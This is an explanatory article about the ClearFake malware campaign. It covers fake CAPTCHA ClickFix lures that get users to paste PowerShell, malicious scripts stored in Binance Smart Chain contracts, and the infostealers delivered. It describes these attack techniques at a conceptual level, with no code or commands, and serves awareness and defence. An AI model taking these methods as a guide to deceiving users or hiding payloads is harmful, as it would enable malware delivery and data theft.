The Evolution of ClearFake: A Deep Dive into Web3 Exploitation

In the ever-evolving landscape of cybersecurity threats, the ClearFake malware family has emerged as a significant player, particularly with its latest version that exploits Web3 capabilities. This sophisticated malware leverages the decentralized nature of blockchain technology to load malicious scripts, resources, and payloads from smart contracts, marking a new chapter in the realm of cyber threats.

The Genesis of ClearFake

First identified in July 2023, ClearFake initially relied on traditional social engineering tactics to spread its malicious payloads. The malware primarily targeted users through compromised websites, particularly those built on WordPress. By employing the ClickFix technique, ClearFake displayed fake error pages that prompted users to copy and paste malicious PowerShell scripts into their Windows terminals. This approach proved effective, with approximately 200,000 unique users visiting compromised sites by July 2024.

The EtherHiding Method: A Game Changer

The latest iteration of ClearFake, which surfaced in December 2024, introduced a groundbreaking technique known as EtherHiding. This method utilizes the Binance Smart Chain to store malicious files within smart contracts, effectively transforming the blockchain into a storage medium for malware resources. Smart contracts, which are self-executing digital agreements, allow ClearFake to retrieve various files, including the ClickFix PowerShell payload.

When a user visits a compromised website, the initial JavaScript code executed loads Application Binary Interfaces (ABIs) necessary for interacting with the smart contracts linked to the attackers’ Ethereum wallets. These ABIs define how applications should communicate with the smart contracts, enabling the retrieval and execution of the malicious code stored within.

The Mechanics of the Attack

ClearFake’s attack chain is meticulously crafted to evade detection and ensure the successful deployment of its payloads. The malware loads additional JavaScript, ABIs, and URLs to the encrypted ClickFix lure HTML from multiple wallets throughout the attack. This multi-faceted approach not only complicates detection efforts but also allows for the collection of system, browser, and cookie information from unsuspecting users.

The encrypted ClickFix HTML is typically hosted on Cloudflare Pages, further obscuring its malicious intent. This innovative use of blockchain technology not only aids in evading traditional detection methods but also guarantees that the malicious files remain permanently stored on the blockchain, making them difficult to eradicate.

Social Engineering Tactics: The ClickFix Lure

The ClickFix social engineering technique has evolved alongside ClearFake, with recent phishing lures imitating legitimate CAPTCHA verification pages. These fake CAPTCHA prompts, which resemble Cloudflare Turnstile or reCAPTCHA pages, trick users into executing malicious PowerShell commands. For instance, the Cloudflare imitation displays a ClickFix prompt after two failed verification attempts, while the reCAPTCHA imitation presents a realistic image selection task followed by a “DNS error” message.

Once users execute the PowerShell commands, the malware activates Mshta.exe, which retrieves and runs JavaScript from a remote server. This process ultimately leads to the installation of various infostealers, including Emmenhtal Loader and Lumma Stealer. Since January 2025, ClearFake has also been observed distributing Vidar Stealer through a basic PowerShell loader.

The Scale of Compromise

Using the wallet addresses associated with the ClearFake campaign as indicators of compromise, researchers from Sekoia.io conducted scans on Censys and uncovered over 9,300 compromised websites as of February 24, 2025. This alarming statistic underscores the widespread impact of ClearFake and highlights the urgent need for enhanced cybersecurity measures.

Conclusion: The Future of Cyber Threats

The advancements in the ClearFake malware family illustrate a concerning trend in the cybersecurity landscape. By harnessing the capabilities of Web3 and blockchain technology, threat actors are developing increasingly sophisticated methods to deliver malware. As cyber threats continue to evolve, it is imperative for individuals and organizations to remain vigilant, adopt robust security practices, and stay informed about the latest developments in malware tactics. The ClearFake campaign serves as a stark reminder of the potential dangers lurking in the digital realm, urging us all to prioritize cybersecurity in an increasingly interconnected world.